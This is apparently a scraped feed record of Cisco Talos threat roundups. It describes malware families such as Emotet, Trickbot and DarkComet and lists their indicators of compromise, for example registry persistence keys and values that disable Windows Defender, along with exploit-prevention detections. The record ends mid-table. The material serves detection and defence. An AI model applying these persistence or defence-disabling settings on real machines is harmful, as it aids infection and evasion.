AMP\n\n[](<https://1.bp.blogspot.com/-6UR3_BxWZG4/XlAYrj5bubI/AAAAAAAADXA/n9kjrsyMa_8Yg0LTzxs4edXXumgnJtSsQCLcBGAsYHQ/s1600/65e7b497cebcd23ceb769656cc011a3cadfdd618657a0d66e14a63f94a113fcd_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-f5odaR7Z7zg/XlAYvLgvk6I/AAAAAAAADXE/ovS8NjQs2fAT0MVvUEVrwGW9B33R6lsgQCLcBGAsYHQ/s1600/65e7b497cebcd23ceb769656cc011a3cadfdd618657a0d66e14a63f94a113fcd_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. 
Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (3408) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (414) \nA PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. \nProcess hollowing detected \\- (210) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (143) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. 
It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (114) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (97) \nInstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (90) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nAtom Bombing code injection technique detected \\- (21) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nCorebot malware detected \\- (12) \nCorebot is a Trojan with many capabilities found in other prominent families. 
It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \nIcedID malware detected \\- (9) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n \n", "cvss3": {}, "published": "2020-02-21T10:43:59", "type": "talosblog", "title": "Threat Roundup for February 14 to February 21", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2020-02-21T10:43:59", "id": "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/4J1oPdwQFdU/threat-roundup-0214-0221.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-08T23:03:05", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 1 and Nov. 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. 
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/talos.tru_.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Dropper.Remcos-7376444-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Kovter-7376187-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.Emotet-7375156-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Trickbot-7374019-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts.
Win.Malware.Phorpiex-7373816-1 | Malware | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, including malware that sends spam emails, ransomware and cryptocurrency miners.
Win.Malware.Zbot-7373691-1 | Malware | Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods like key-logging and form-grabbing.
Win.Malware.DarkComet-7371375-1 | Malware | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Packed.ZeroAccess-7370742-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns.
* * *

## Threat Breakdown

### Win.Dropper.Remcos-7376444-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `Snk` | 8
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `Snk` | 8
`<HKCU>\SOFTWARE\XLR4615DFT-CRBSFT`, Value Name: `exepath` | 6
`<HKCU>\SOFTWARE\XLR4615DFT-CRBSFT`, Value Name: `licence` | 6

Mutexes | Occurrences
---|---
`Remcos_Mutex_Inj` | 8
`XLR4615DFT-CRBSFT` | 8
`Global\0e3e6d21-fc20-11e9-a007-00501e3ae7b5` | 1
`Global\96ab2081-00fe-11ea-a007-00501e3ae7b5` | 1
`Global\d24f50c1-00fe-11ea-a007-00501e3ae7b5` | 1
`Global\77238861-00fe-11ea-a007-00501e3ae7b5` | 1

Files and/or directories created | Occurrences
---|---
`%TEMP%\install.vbs` | 8
`%APPDATA%\System32` | 8
`%APPDATA%\System32\Snk.exe` | 8
`%APPDATA%\Runtime3` | 6
`%APPDATA%\Runtime3\1627.dat` | 6
`%TEMP%\<random, matching '[a-z]{4,9}'>.exe` | 5

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP

* * *

### Win.Dropper.Kovter-7376187-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE`, Value Name: `DisableOSUpgrade` | 25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE`, Value Name: `ReservationsAllowed` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `ssishoff` | 25
`<HKCR>\.16A05D` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `vrxzdhbyv` | 25
`<HKCU>\SOFTWARE\XVYG` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG`, Value Name: `tbqjcmuct` | 25
`<HKCU>\SOFTWARE\XVYG`, Value Name: `tbqjcmuct` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG`, Value Name: `xedvpa` | 25
`<HKCU>\SOFTWARE\XVYG`, Value Name: `xedvpa` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG`, Value Name: `svdjlvs` | 25
`<HKCU>\SOFTWARE\XVYG`, Value Name: `svdjlvs` | 25
`<HKCR>\7B507\SHELL\OPEN\COMMAND` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG`, Value Name: `lujyoqmfl` | 25
`<HKCU>\SOFTWARE\XVYG`, Value Name: `lujyoqmfl` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101`, Value Name: `CheckSetting` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103`, Value Name: `CheckSetting` | 25
`<HKCU>\SOFTWARE\XVYG`, Value Name: `tnzok` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG`, Value Name: `tnzok` | 25
`<HKCU>\SOFTWARE\XVYG`, Value Name: `usukxpt` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG`, Value Name: `usukxpt` | 25
`<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>` | 21
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13`, Value Name: `Blob` | 7
`<HKCU>\SOFTWARE\YNRVKCYV3`, Value Name: `kwS6y5` | 1

Mutexes | Occurrences
---|---
`EA4EC370D1E573DA` | 25
`A83BAA13F950654C` | 25
`Global\7A7146875A8CDE1E` | 25
`B3E8F6F86CDD9D8B` | 25
`408D8D94EC4F66FC` | 20
`Global\350160F4882D1C98` | 20
`053C7D611BC8DF3A` | 20

Files and/or directories created | Occurrences
---|---
`%LOCALAPPDATA%\39b03\6a5cc.16a05d` | 25
`%LOCALAPPDATA%\39b03\7cbdf.bat` | 25
`%HOMEPATH%\Local Settings\Application Data\2501\1ffa.41d68` | 20
`%HOMEPATH%\Local Settings\Application Data\2501\aae7.bat` | 20

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP

* * *

### Win.Dropper.Emotet-7375156-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `Type` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `Start` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `ErrorControl` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `ImagePath` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `DisplayName` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `WOW64` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `ObjectName` | 115
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS`, Value Name: `Description` | 115

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 115
`Global\M98B68E3C` | 115
`Global\M3C28B0E4` | 42
`Global\I3C28B0E4` | 42

Files and/or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\spooleripspsb.exe` | 2
`\TEMP\694.exe` | 2
`%SystemRoot%\SysWOW64\spooleripspsa.exe` | 1
`\TEMP\L6WtzMgB.exe` | 1
`\TEMP\wdEnqutV.exe` | 1
`\TEMP\pzcc3lk.exe` | 1
`\TEMP\p1cvp.exe` | 1
`\TEMP\ux68b0c6lxc0fow.exe` | 1
`\TEMP\z825f3w9uh.exe` | 1
`\TEMP\gcb5of4v1tlz.exe` | 1
`\TEMP\ezxnt4.exe` | 1
`\TEMP\39v3vti54d.exe` | 1
`\TEMP\tdr3z0u10.exe` | 1
`\TEMP\yqr4645h3g.exe` | 1
`\TEMP\70vol09busiw7g.exe` | 1
`\TEMP\2bn1wg8bam49.exe` | 1
`\TEMP\afoly3.exe` | 1
`\TEMP\yumjilsuex5ce.exe` | 1
`\TEMP\2gb7kk6.exe` | 1
`\TEMP\f80gj19dm6pg.exe` | 1
`\TEMP\itb9yhf.exe` | 1
`\TEMP\sd0ew7kemxl.exe` | 1
`\TEMP\9b65hy6s.exe` | 1
`\TEMP\5q1otsijpw2d6rr.exe` | 1
`\TEMP\002109r7ga.exe` | 1

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

AMP

Umbrella

* * *

### Win.Malware.Trickbot-7374019-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER`, Value Name: `DisableAntiSpyware` | 26
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND`, Value Name: `DeleteFlag` | 26
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND`, Value Name: `Start` | 26
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION`, Value Name: `DisableBehaviorMonitoring` | 26
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION`, Value Name: `DisableIOAVProtection` | 26
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER` | 26
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION` | 26
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION`, Value Name: `DisableOnAccessProtection` | 26
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION`, Value Name: `DisableScanOnRealtimeEnable` | 26
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13`, Value Name: `Blob` | 11

Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 26

Files and/or directories created | Occurrences
---|---
`%APPDATA%\wnetwork\settings.ini` | 26
`%System32%\Tasks\Windows Network` | 26
`%APPDATA%\wnetwork` | 26
`%APPDATA%\WNETWORK\<original file name>.exe` | 26

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | 

#### Screenshots of Detection

AMP

* * *

### Win.Malware.Phorpiex-7373816-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST` | 13
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `Microsoft Windows Service` | 12
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `Microsoft Windows Service` | 12
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST`, Value Name: `C:\Windows\system32\rundll32.exe` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\PIXEDFU` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\PIXEDFU`, Value Name: `Impersonate` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\PIXEDFU`, Value Name: `Asynchronous` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\PIXEDFU`, Value Name: `MaxWait` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\PIXEDFU`, Value Name: `DllName` | 3
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\PIXEDFU`, Value Name: `Startup` | 3
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `pixedfu` | 3
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION`, Value Name: `FFC6F26321` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `BCC6F26321` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE`, Value Name: `*BCC6F26321` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `00FFC6F26321` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION`, Value Name: `C6F26321` | 1

Mutexes | Occurrences
---|---
`.:-Tldr-:.` | 10
`A9MTX7ERFAMKLQ` | 3
`A9ZLO3DAFRVH1WAE` | 3
`AhY93G7iia` | 3
`B81XZCHO7OLPA` | 3
`BSKLZ1RVAUON` | 3
`F-DAH77-LLP` | 3
`FURLENTG3a` | 3
`FstCNMutex` | 3
`GJLAAZGJI156R` | 3
`I-103-139-900557` | 3
`I106865886KMTX` | 3
`IGBIASAARMOAIZ` | 3
`J8OSEXAZLIYSQ8J` | 3
`LXCV0IMGIXS0RTA1` | 3
`MKS8IUMZ13NOZ` | 3
`OLZTR-AFHK11` | 3
`OPLXSDF19WRQ` | 3
`PLAX7FASCI8AMNA` | 3
`RGT70AXCNUUD3` | 3
`TEKL1AFHJ3` | 3
`TXA19EQZP13A6JTR` | 3
`VSHBZL6SWAG0C` | 3
`chimvietnong` | 3
`drofyunfdou` | 3

*See JSON for more IOCs

Files and/or directories created | Occurrences
---|---
`\_\DeviceManager.exe` | 12
`\.lnk` | 12
`E:\.lnk` | 12
`E:\$RECYCLE.BIN` | 12
`E:\_` | 12
`E:\_\DeviceManager.exe` | 12
`%SystemRoot%\T-580580975794906058` | 12
`%APPDATA%\winsvcmgr.txt` | 12
`%SystemRoot%\T-580580975794906058\winsvc.exe` | 12
`%HOMEPATH%\Local Settings\Application Data\pixedfu.dll` | 3
`%LOCALAPPDATA%\pixedfu.dll` | 3
`%TEMP%\323221246224071.exe` | 2
`\$Recycle.Bin\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\AppData\_HELP_INSTRUCTION.TXT` | 1
`%APPDATA%\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\Desktop\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\Documents\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\Downloads\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\Favorites\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\Links\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\Saved Games\_HELP_INSTRUCTION.TXT` | 1
`%HOMEPATH%\_HELP_INSTRUCTION.TXT` | 1
`%PUBLIC%\Music\Sample Music\12EAEF0D255F4C3289F8C16727C42FE6.BACKUP` | 1
`%PUBLIC%\Music\Sample Music\20410F1A046679B6EE5BB84B050B5D6A.BACKUP` | 1
`%PUBLIC%\Music\Sample Music\CD5F520B00FF264246AA4685031109F6.BACKUP` | 1

*See JSON for more IOCs

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | 

#### Screenshots of Detection

AMP

* * *

### Win.Malware.Zbot-7373691-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS`, Value Name: `LoadAppInit_DLLs` | 48
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS`, Value Name: `AppInit_DLLs` | 48

Files and/or directories created | Occurrences
---|---
`%System32%\Tasks\aybbmte` | 48
`%ProgramData%\Mozilla\thfirxd.exe` | 48
`%ProgramData%\Mozilla\lygbwac.dll` | 48
`%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll` | 42
`%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe` | 42
`%SystemRoot%\Tasks\kylaxsk.job` | 42

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP

* * *

### Win.Malware.DarkComet-7371375-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\DC3_FEXEC` | 16
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE`, Value Name: `EnableFirewall` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM`, Value Name: `DisableTaskMgr` | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE`, Value Name: `DisableNotifications` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM`, Value Name: `EnableLUA` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER`, Value Name: `AntiVirusDisableNotify` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER`, Value Name: `UpdatesDisableNotify` | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `Start` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN`, Value Name: `NoControlPanel` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM`, Value Name: `DisableRegistryTools` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN` | 1

Mutexes | Occurrences
---|---
`DC_MUTEX-F54S21D` | 10
`DC_MUTEX-<random, matching [A-Z0-9]{7}>` | 6

Files and/or directories created | Occurrences
---|---
`%TEMP%\dclogs` | 12
`%TEMP%\tmpcmd.bat` | 1

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP

* * *

### Win.Packed.ZeroAccess-7370742-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `Start` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS`, Value Name: `DeleteFlag` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC`, Value Name: `DeleteFlag` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `DeleteFlag` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER`, Value Name: `Start` | 8
`<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32`, Value Name: `ThreadingModel` | 8
`<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32` | 8
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `Windows Defender` | 8
`<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS`, Value Name: `Type` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS`, Value Name: `ErrorControl` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `Type` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `ErrorControl` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `DeleteFlag` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `Type` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `ErrorControl` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC`, Value Name: `Type` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC`, Value Name: `ErrorControl` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010`, Value Name: `
